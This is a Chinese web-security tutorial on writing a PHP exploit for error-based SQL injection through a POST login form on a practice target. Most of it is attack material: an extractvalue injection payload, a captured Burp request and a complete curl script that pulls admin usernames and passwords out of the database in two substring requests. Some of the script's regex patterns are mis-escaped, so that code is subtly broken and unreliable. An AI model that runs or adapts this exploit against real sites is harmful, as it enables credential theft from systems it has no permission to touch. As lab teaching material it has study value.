WEB安全第七章exp编写二 POST注入exp编写
编写的exp比较简单,这一篇将会提高难度,将会编写复杂一些的exp。
任何复杂的exp 都是由简单的模块组合而来的。 看起来复杂,实际上简单。
1、POST注入编写
打开暗月靶机测试系统 来到登录页面。
登录页面是存在一个SQL注入。利用代码如下。
'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#
因为 使用 extractvalue函数只能报错32长度的数据 通过上面语句 先获取数据的长度 再使用 substring进行数据截取。
这次继续用php来编写exp 先用burpsuite 抓取数据包
POST /login.php HTTP/1.1 Host: target_sys.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Referer: http://target_sys.com/login.php Content-Type: application/x-www-form-urlencoded Content-Length: 207 Cookie: PHPSESSID=qknq733uhjge42eel2go9kpli0 Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280x23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=123456&submit=%E7%99%BB%E5%BD%95
这个部分需要变成php的数组。
username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280x23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=123456&submit=%E7%99%BB%E5%BD%95
可以转变成这样。
$post_data=array("username"=>"'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95");
模拟post注入提交如下代码
<?php /** * 模拟post进行url请求 * @param string $url * @param array $post_data */ function request_post($url = '', $post_data = array()) { if (empty($url) || empty($post_data)) { return false; } $o = ""; foreach ( $post_data as $k => $v ) { $o.= "$k=" . urlencode( $v ). "&" ; } $post_data = substr($o,0,-1); $postUrl = $url; $curlPost = $post_data; $ch = curl_init();//初始化curl curl_setopt($ch, CURLOPT_URL,$postUrl);//抓取指定网页 curl_setopt($ch, CURLOPT_HEADER, 0);//设置header curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//要求结果为字符串且输出到屏幕上 curl_setopt($ch, CURLOPT_POST, 1);//post提交方式 curl_setopt($ch, CURLOPT_POSTFIELDS, $curlPost); $data = curl_exec($ch);//运行curl curl_close($ch); return $data; } #$post_data="username=%27and+extractvalue%281%2C+concat%280x7e%2CLENGTH%28%28SELECT+distinct+concat+%280x23%2Cusername%2C0x3a%2Cpassword%2C0x23%29+FROM+admin+limit+0%2C1%29%29%29%29%23&password=123456&submit=%E7%99%BB%E5%BD%95"; $post_data=array("username"=>"'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95"); function get_strlen($url){ $post_data=array("username"=>"'and extractvalue(1, concat(0x7e,LENGTH((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1))))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95"); $html = request_post($url,$post_data); preg_match("/~(/d+)/", $html,$matches); return $matches[1]; } $url = "http://target_sys.com/login.php"; $lengstr = get_strlen($url); if($lengstr){ $payload =array("username"=>"'and extractvalue(1, concat(0x7e,substring((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1),1,32)))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95"); $html = request_post($url,$payload); preg_match("/~#(.*?)/'/", $html,$matches); $m1 = $matches[1]; $payload2 =array("username"=>"'and extractvalue(1, concat(0x7e,substring((SELECT distinct concat (0x23,username,0x3a,password,0x23) FROM admin limit 0,1),32,{$lengstr})))#","password"=>"password=123456","submit"=>"%E7%99%BB%E5%BD%95"); $html = request_post($url,$payload2); preg_match("/~#(.*?)/'/", $html,$matches); $m2 = $matches[1]; echo "[+]".$m1.$m2."[+]"; }else{ echo "[-]error[-]"; } # $html = request_post($url,$post_data); # print $html;
下载 exp.php exp-2.rar
preg_match("/~#(.*?)/'/", $html,$matches);
这个部分是正则 出来的数据 可以理解成 如果成功的情况下 数据会在这个位置显示出来 ,将会获取。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论